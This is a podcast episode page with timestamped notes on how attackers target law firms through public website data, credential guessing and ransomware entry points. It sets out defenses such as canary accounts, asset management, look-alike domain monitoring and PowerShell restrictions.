Subscribe to the CyberThreatPOV Podcast

Episode 40: How Attackers Target Law Firms and How To Detect & Prevent It

It’s no secret law firms have become prime targets for attackers due to the sensitive information they handle and the clients they do business with. In this episode Brad and Spencer discuss common tactics used by attackers to breach law firms’ defenses and provide practical tips on how to detect and prevent these types of attacks.

LegalSec Conference

  • 00:22 LegalSec is a cybersecurity conference specifically targeted for law firms.
  • 00:39 ILTA (International Legal Technology Association) puts on the event.
  • 00:59 The conference covers topics such as vulnerability management, asset inventory, and threat actors.

Importance of Cybersecurity for Law Firms

  • 01:19 Law firms are being targeted by attackers due to the sensitive information they hold.
  • 01:41 All law firms have similarities in how they are attacked, regardless of their security maturity level.
  • 02:01 It is important to detect and prevent attacks to keep law firms secure.

Offensive Security Group’s Experience with Law Firms

  • 02:19 Around 50% of the Offensive Security Group’s client base in the pen testing world, security operations center, and ISO group are law firms.
  • 03:41 The group has been involved with legal conferences such as ILTA and Legal SEC due to their involvement in that market vertical.


  • 03:57 The Offensive Security Group makes an extra effort to attend legal conferences because they are among peers and friends in that market vertical.

04:54 Introduction

In this section, the speaker introduces themselves and their company, SecureIT360. They discuss their passion for legal cybersecurity and how law firms are targeted.

Key Points

  • The speaker discusses the craftsmanship, effort, and customer service of SecureIT360.
  • Law firms are not uniquely targeted by threat actors.
  • The speaker mentions that they will be discussing two things that set law firms apart from other verticals: access to a large breadth of information and the impact on reputation.

05:31 Law Firms’ Access to Information

In this section, the speaker discusses how law firms have access to a large amount of sensitive information due to the nature of their work.

Key Points

  • Law firms have access to a large breadth of information due to the type of cases they handle.
  • Even smaller law firms in cities may have prominent people in the area as clients.
  • Law firms handling mergers and acquisitions may be privy to sensitive information during discovery.

08:05 Unique Impact on Reputation

In this section, the speaker discusses how a serious security incident at a law firm could be significantly detrimental to their future due to reputational damage.

Key Points

  • Ransomware extortion is uniquely impactful for law firms due to reputational damage.
  • A serious security incident could potentially harm a firm’s reputation and future success in litigation.
  • The reputational impact is different than other industries such as hospitals or Amazon because clients choose who they do business with in the legal space.

10:03 Law Firm Websites and Information Exposure

The section discusses how law firms use their attorneys’ information as marketing and sales to attract new clients. However, this information is also available to attackers who can use it for social engineering or phishing attacks.

Law Firms Use Attorneys’ Information for Marketing

  • Law firms showcase their attorneys’ credentials on their websites to attract new clients. 10:03
  • This includes industry awards, speaking engagements, and educational background. 10:03

Attackers Can Exploit Publicly Available Information

  • Attackers can access publicly available information on law firm websites such as email addresses, phone numbers, education history, and awards received. 10:20
  • This information can be used for social engineering or phishing attacks by creating a believable pretext that targets the ego or personality of the victim. 11:03

External Penetration Testing Targets Law Firm Websites

  • During external penetration testing of law firms, testers often start by downloading all publicly available information from the firm’s website using scripts they have written. 12:00
  • Testers can then build a user list to log into various systems using this information.12:20

12:56 Using Public Databases for Social Engineering

The section discusses how public databases can be used in social engineering attacks against law firms.

Common Usernames Make Attacks Easier

  • Usernames in many environments are the same as email addresses which makes them easy to guess based on publicly available information.12:56
  • Attackers can leverage third-party websites that require usernames instead of email addresses to log in with stolen credentials such as SSL VPN accounts.13:14

Public Databases Provide Valuable Information

  • Attackers can use public databases to find information such as graduation dates, addresses, and workplaces of individuals.13:33
  • This information can be used to create convincing password lists that can be used in brute force attacks against accounts.13:48


  • Law firms need to be aware of the risks associated with publicly available information on their websites and take steps to protect themselves from social engineering attacks.14:06

14:45 Understanding Types of Attacks and Law Firm Targeting

In this section, the speaker recommends setting up Canary accounts or emails to detect spam campaigns, social engineering, phishing attacks, and other malicious activities. The speaker also suggests using deception techniques to trap attackers.

Canary Accounts and Emails

  • 15:03 Setting up Canary accounts or emails can be an effective way to detect spam campaigns, social engineering, phishing attacks, and other malicious activities.
  • 15:22 Creating fake personas on LinkedIn or fake email addresses that are not in use can help block unwanted emails by immediately blocking them with your email filter at your Edge.
  • 15:41 Deception techniques such as cloning websites or creating fake PDFs online with false metadata can also be used to trap attackers.

Deception Techniques

  • 15:59 Using deception techniques on the Blue Team side involves thinking like an attacker and trapping them intentionally.
  • 16:15 Embedding fake account numbers in GitHub repos is one example of a deception technique that can be used to track threat actors’ behavior and location.
  • 16:32 Deception techniques such as setting up traps for attackers can cause hesitation and slow down their progress. This creates more opportunities for them to make mistakes and get detected.

17:31 Canaries as a Reliable Defense Tactic

In this section, the speakers discuss how deception tactics such as using Canaries are reliable defense tactics against cyber threats. They explain how Canaries work by putting adversaries on the back foot.

Canaries as Reliable Defense Tactics

  • 17:52 Using Canaries is a reliable defense tactic because it is uniquely successful without false positives.
  • 18:07 Canaries create traps that cause hesitation and slow down attackers, creating more opportunities for them to make mistakes and get detected.
  • 18:30 The goal of defense in depth is not to be 100% secure but to create enough trouble for attackers that they cannot move around undetected.

19:26 Monitoring Internal and External Attack Surfaces

In this section, the speakers discuss the importance of monitoring internal and external attack surfaces. They emphasize user awareness, reviewing your attack surface, regularly reviewing your external footprint, and reviewing information on your website.

Importance of User Awareness

  • Educating users on what suspicious stuff looks like is important.
  • Users should be aware of what to look out for.

Reviewing Your Attack Surface

  • Regularly review your attack surface.
  • It doesn’t have to be a complicated attack surface management platform or product.
  • You could do it yourself.

Regularly Review Your External Footprint

  • Regularly review what services you have open on the internet.
  • Review what websites you have available.
  • Review domains that are in use.

Review Information on Your Website

  • All information on your website should be reviewed regularly.
  • Check if you’re accidentally exposing anything that you didn’t know about.

20:39 Detecting Impersonation Attacks

In this section, the speakers discuss how to detect impersonation attacks. They suggest looking at various permutations of your domain and seeing if they’re registered or if certificates were created for them.

Identifying Look-Alike Domains

  • If somebody creates a look-alike domain, is that something that you’re going to be able to identify?
  • There are email security products that can help with some of that.

Detecting Impersonation Attacks

  • Looking at various permutations of your domain can help detect impersonation attacks.
  • See if they’re registered or if certificates were created for them.

21:20 Asset Management Program as Foundation for Security Program

In this section, the speakers discuss the importance of asset management programs as the foundation for security programs. They emphasize that knowing what you have and its status is crucial to your security program’s success.

Importance of Asset Management Program

  • Your asset management program says more about the future success of your security program than anything else.
  • Knowing what you have and its status is crucial to your security program’s success.

Problems Solved by Asset Management Program

  • The number of problems that can be solved before they ever happen just by keeping an eye on what you have outside and inside is significant.
  • You can’t patch it or vulnerability scan it if you don’t know you have it.

22:50 Ransomware Extortion

In this section, the speakers discuss ransomware extortion and how it begins on the endpoint. They suggest using MFA, strong passwords, and checking endpoints regularly.

Access Methods for Ransomware Extortion

  • Ransomware extortion often begins on the endpoint.
  • Access methods include RDP to the internet with weak credentials or SSL VPNs with weak credentials.

Endpoint Security

  • People are buying EDR and XDR but not focusing on endpoint security.
  • Checking boxes and moving on is not enough.

Mature Firm Endpoint Security

  • A mature firm should focus on application control, MFA, strong passwords, etc.

24:05 Endpoint Security Best Practices

In this section, the speakers discuss endpoint security best practices to mitigate ransomware attacks. They emphasize the importance of application control, regular endpoint reviews, and Powershell restrictions.

Mitigating Ransomware Attacks

  • 24:05 Threat actors want high-level access to ransom the environment or affect as many machines as possible.
  • 24:21 Application control and blocking mounting of ISO files can help mitigate initial access.
  • 24:40 Regularly reviewing endpoints and patching third-party software is important.
  • 25:03 Powershell is heavily used by threat actors for execution and downloading malicious payloads.
  • 25:49 Good Powershell restrictions and monitoring for suspicious activity can go a long way in mitigating attacks.

Implementing Endpoint Security

  • 26:06 Application control, application whitelisting, and Windows Defender application guard are essential for endpoint security.
  • 26:26 Implementing these alongside Powershell monitoring can provide a strong defense against attacks.
  • 26:44 Custom rules associated with malicious Powershell scripts can be set up to monitor everything.
  • 27:01 Setting these goals can make firms part of the one or two percent who are really secure.

Challenges in Endpoint Security

  • 27:21 Lack of support for security governance and responsibility is a challenge in implementing endpoint security measures.
  • 28:08 IT and security often have to do what they can by themselves due to lack of support from other departments.

Overall, implementing good endpoint security practices such as application control, regular reviews, patching third-party software, restricting Powershell usage, and implementing custom rules associated with malicious scripts can go a long way in mitigating ransomware attacks. However, challenges such as lack of support for security governance and responsibility can make it difficult to implement these measures effectively.

28:45 Checking Assumptions

In this section, the speaker talks about the importance of checking assumptions and implementing things correctly to ensure a strong security posture.

Importance of Checking Assumptions

  • 29:03 It is important to check assumptions to ensure that things are implemented correctly.
  • 29:22 Implementing security measures can be difficult, especially for larger teams with big change control.
  • 29:40 Firms who implement these measures notice a significant increase in their defense and security posture.

30:00 Establishing a Security Culture

In this section, the speaker emphasizes the importance of establishing a security culture within an organization.

Internal Pen Testing

  • 30:00 Pen testing is an effective way to test internal controls and identify weaknesses.
  • 30:17 Leadership investment in effort, time, and money is necessary for establishing a strong security culture.

Strategies for Establishing a Security Culture

  • 30:35 There are many strategies that can be employed to establish a security culture that aren’t expensive or require extensive leadership involvement.
  • 30:54 Sharing this podcast with friends and colleagues is one way to help spread awareness about cybersecurity best practices.


Work with Us: